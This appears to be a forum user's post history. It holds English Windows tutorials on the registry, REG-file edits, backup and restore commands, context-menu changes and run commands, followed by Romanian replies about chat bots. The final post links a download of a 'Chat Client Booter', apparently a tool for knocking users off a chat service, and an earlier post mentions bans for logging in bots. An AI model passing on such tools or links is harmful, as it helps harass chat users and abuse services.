  18. What is the Registry? The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry. The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article). The Structure of The Registry The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer. Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context. There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows: * HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface. * HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings. * HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer. * HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch. * HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration. * HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system. Each registry value is stored as one of five main data types: * REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format. * REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format. * REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32) * REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32) * REG_SZ - This type is a standard string, used to represent human readable text values. Other data types not available through the standard registry editors include: * REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format. * REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format. * REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type. * REG_NONE - No defined value type. * REG_QWORD - A 64-bit number. * REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format. * REG_RESOURCE_LIST - A device-driver resource list. Editing The Registry The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below. An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ. Create a Shortcut to Regedit This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor. Using Regedit to modify your Registry Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder. Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete. Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry! Importing and Exporting Registry Settings A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below: Quote: REGEDIT4 [HKEY_LOCAL_MACHINE\SYSTEM\Setup] "SetupType"=dword:00000000 "CmdLine"="setup -newsetup" "SystemPrefix"=hex:c5,0b,00,00,00,40,36,02 The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary. So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry. Deleting keys or values using a REG file It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this: Quote: REGEDIT4 [-HKEY_LOCAL_MACHINE\SYSTEM\Setup] The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like: Quote: REGEDIT4 [HKEY_LOCAL_MACHINE\SYSTEM\Setup] "SetupType"=- Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first. Regedit Command Line Options Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific. * regedit.exe [options] [filename] [regpath] * [filename] Import .reg file into the registry * /s [filename] Silent import, i.e. hide confirmation box when importing files * /e [filename] [regpath] Export the registry to [filename] starting at [regpath] e.g. regedit /e file.reg HKEY_USERS\.DEFAULT * /L:system Specify the location of the system.dat to use * /R:user Specify the location of the user.dat to use * /C [filename] Compress (Windows 98) * /D [regpath] Delete the specified key (Windows 98) Maintaining the Registry How can you backup and restore the Registry? Windows 95 Microsoft included a utility on the Windows 95 CD-ROM that lets you create backups of the Registry on your computer. The Microsoft Configuration Backup program, CFGBACK.EXE, can be found in the \Other\Misc\Cfgback directory on the Windows 95 CD-ROM. This utility lets you create up to nine different backup copies of the Registry, which it stores, with the extension RBK, in your \Windows directory. If your system is set up for multiple users, CFGBACK.EXE won't back up the USER.DAT file. After you have backed up your Registry, you can copy the RBK file onto a floppy disk for safekeeping. However, to restore from a backup, the RBK file must reside in the \Windows directory. Windows 95 stores the backups in compressed form, which you can then restore only by using the CFGBACK.EXE utility. Windows 98 Microsoft Windows 98 automatically creates a backup copy of the registry every time Windows starts, in addition to this you can manually create a backup using the Registry Checker utility by running SCANREGW.EXE from Start | Run menu. What to do if you get a Corrupted Registry Windows 95, 98 and NT all have a simple registry backup mechanism that is quite reliable, although you should never simply rely on it, remember to always make a backup first! Windows 95 In the Windows directory there are several hidden files, four of these will be SYSTEM.DAT & USER.DAT, your current registry, and SYSTEM.DA0 & USER.DA0, a backup of your registry. Windows 9x has a nice reature in that every time it appears to start successfully it will copy the registry over these backup files, so just in case something goes wrong can can restore it to a known good state. To restore the registry follow these instruction: * Click the Start button, and then click Shut Down. * Click Restart The Computer In MS-DOS Mode, then click Yes. * Change to your Windows directory. For example, if your Windows directory is c:\windows, you would type the following: cd c:\windows * Type the following commands, pressing ENTER after each one. (Note that SYSTEM.DA0 and USER.DA0 contain the number zero.) attrib -h -r -s system.dat attrib -h -r -s system.da0 copy system.da0 system.dat attrib -h -r -s user.dat attrib -h -r -s user.da0 copy user.da0 user.dat * Restart your computer. Following this procedure will restore your registry to its state when you last successfully started your computer. If all else fails, there is a file on your hard disk named SYSTEM.1ST that was created when Windows 95 was first successfully installed. If necessary you could also change the file attributes of this file from read-only and hidden to archive to copy the file to C:\WINDOWS\SYSTEM.DAT. Windows NT On Windows NT you can use either the "Last Known Good" option or RDISK to restore to registry to a stable working configuration. How can I clean out old data from the Registry? Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process, the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values, it removes them from the Windows Registry after having recording those entries in the Undo.Reg file.
  19. How To Remove and Add Right-Click Menu Items from Files and Folders Removing Items A lot of programs you install will add themselves to the right-click menu of your files and/or folders. And most times, you have no choice in the matter and, as a result, your right-click menu can get very long with added items you don't even use. The last person I was helping with this had a right context menu so long that the Rename option was no longer visible! Fortunately, you can easily remove those unwanted menu items, if you know the registry values to edit. And it's not at all difficult once you know the keys responsible for the additions. For Files, the secret lies in the "context menu handlers" under the shellex subkey for "All Files" which, in the registry, is nothing but an asterisk - like a dos wildcard, which means the values entered apply to all files. It is at the very top of the Root key, right here: HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers Click the the + sign next to the ContextMenuHandlers key, to expand it. Now you will see some of the programs that have added items to your right-click menu. Simply delete the program keys you don't want. Yup! It's that simple. If deleting makes you uneasy, just export the key before deleting it. Or, instead of deleting the values, disable them. Simply double click the default value for the program on the right hand pane and rename the clsid value by placing a period or dash in front of it. ie; - {b5eedee0-c06e-11cf-8c56-444553540000} Then exit the registry, refresh, and right click a file to see if the item was removed from the menu. Some programs - like WinZip or WinRar - will add several items to your right click menu but all of them will be removed by deleting or disabling their one context menu handler. Note that the above key only applies to the right click menu of files. To remove entries from the right click context menu of folders, you need to navigate to the Folder and Drive keys: HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers All you have to do is follow the same procedure as for Files - either disable or delete items you wish to remove. Adding Items Adding Items to the right click menu of Files and Folders is also fairly simple using the Registry. It just involves the creation of a few new keys for each item you wish to add. You edit the same keys used for removing items. Let's use Notepad as an example of an item you'd like to add to the right click menu of all your files or folders. For folders, go to this key: HKEY_CLASSES_ROOT\Folder Click the + sign next to Folder and expand it so that the Shell key is visible. Right click the Shell key and choose New>Key and name the key Notepad or whatever else you'd prefer (whatever the key is named is what will appear in the right-click menu). Now right click the new key you made and create another key named Command. Then, in the right hand pane, double click "Default" and enter Notepad.exe as the value. Exit the registry, refresh, and right click any folder. Notepad should now be on the context menu. For files, go here again: HKEY_CLASSES_ROOT\* Expand the * key and see if a Shell key exists. If it does exist, follow the same procedure as for folders. If it does not exist, you'll have to create a new Shell first. Just right click the * key and choose New>Key and name it Shell. Then right click the Shell key and continue on the same way you did for adding items to the right click menu of folders. Once done, Notepad should appear as an option in the right click menu of all your files.
  20. Accessibility Controls access.cpl Add Hardware Wizard hdwwiz.cpl Add/Remove Programs appwiz.cpl Administrative Tools control admintools Automatic Updates wuaucpl.cpl Bluetooth Transfer Wizard fsquirt Calculator calc Certificate Manager certmgr.msc Character Map charmap Check Disk Utility chkdsk Clipboard Viewer clipbrd Command Prompt cmd Component Services dcomcnfg Computer Management compmgmt.msc Date and Time Properties timedate.cpl DDE Shares ddeshare Device Manager devmgmt.msc Direct X Control Panel (If Installed)* directx.cpl Direct X Troubleshooter dxdiag Disk Cleanup Utility cleanmgr Disk Defragment dfrg.msc Disk Management diskmgmt.msc Disk Partition Manager diskpart Display Properties control desktop Display Properties desk.cpl Display Properties (w/Appearance Tab Preselected) control color Dr. Watson System Troubleshooting Utility drwtsn32 Driver Verifier Utility verifier Event Viewer eventvwr.msc File Signature Verification Tool sigverif Findfast findfast.cpl Folders Properties control folders Fonts control fonts Fonts Folder fonts Free Cell Card Game freecell Game Controllers joy.cpl Group Policy Editor (XP Prof) gpedit.msc Hearts Card Game mshearts Iexpress Wizard iexpress Indexing Service ciadv.msc Internet Properties inetcpl.cpl IP Configuration (Display Connection Configuration) ipconfig /all IP Configuration (Display DNS Cache Contents) ipconfig /displaydns IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns IP Configuration (Release All Connections) ipconfig /release IP Configuration (Renew All Connections) ipconfig /renew IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns IP Configuration (Display DHCP Class ID) ipconfig /showclassid IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid Java Control Panel (If Installed) jpicpl32.cpl Java Control Panel (If Installed) javaws Keyboard Properties control keyboard Local Security Settings secpol.msc Local Users and Groups lusrmgr.msc Logs You Out Of Windows logoff Mcft Chat winchat Minesweeper Game winmine Mouse Properties control mouse Mouse Properties main.cpl Network Connections control netconnections Network Connections ncpa.cpl Network Setup Wizard netsetup.cpl Notepad notepad Nview Desktop Manager (If Installed) nvtuicpl.cpl Object Packager packager ODBC Data Source Administrator odbccp32.cpl On Screen Keyboard osk Opens AC3 Filter (If Installed) ac3filter.cpl Password Properties password.cpl Performance Monitor perfmon.msc Performance Monitor perfmon Phone and Modem Options telephon.cpl Power Configuration powercfg.cpl Printers and Faxes control printers Printers Folder printers Private Character Editor eudcedit Quicktime (If Installed) QuickTime.cpl Regional Settings intl.cpl Registry Editor regedit Registry Editor regedit32 Remote Desktop mstsc Removable Storage ntmsmgr.msc Removable Storage Operator Requests ntmsoprq.msc Resultant Set of Policy (XP Prof) rsop.msc Scanners and Cameras sticpl.cpl Scheduled Tasks control schedtasks Security Center wscui.cpl Services services.msc Shared Folders fsmgmt.msc Shuts Down Windows shutdown Sounds and Audio mmsys.cpl Spider Solitare Card Game spider SQL Client Configuration cliconfg System Configuration Editor sysedit System Configuration Utility msconfig System File Checker Utility (Scan Immediately) sfc /scannow System File Checker Utility (Scan Once At Next Boot) sfc /scanonce System File Checker Utility (Scan On Every Boot) sfc /scanboot System File Checker Utility (Return to Default Setting) sfc /revert System File Checker Utility (Purge File Cache) sfc /purgecache System File Checker Utility (Set Cache Size to size x) sfc /cachesize=x System Properties sysdm.cpl Task Manager taskmgr Telnet Client telnet User Account Management nusrmgr.cpl Utility Manager utilman Windows Firewall firewall.cpl Windows Magnifier magnify Windows Management Infrastructure wmimgmt.msc Windows System Security Tool syskey Windows Update Launches wupdmgr Windows XP Tour Wizard tourstart Wordpad wordpad
  21. nu stiu sigur...dar cred ca e C++
  22. @amp3r iti lipseste kewlbuttonz.ocx cauta asta pe google sau odc si pune-l langa program! (vezi ce a scris nemessis mai bine nu incerci.. poate iti iei ban daca loghezi botii) @MostWanted ... dupa cum a zis nemessis cred ca ai luat ban ) ... poate ti-au dat pe 12 ore. Bine ca nu am incercat programu...
  23. virusss am mai incercat acum sa dowlowadez si a mers... habar nu am de ce nu mergea la pranz... ti-am pus pe rs. Link: http://rapidshare.com/files/22013091/GMC---Chat_Client_Booter_v2.zip
×
×
  • Create New...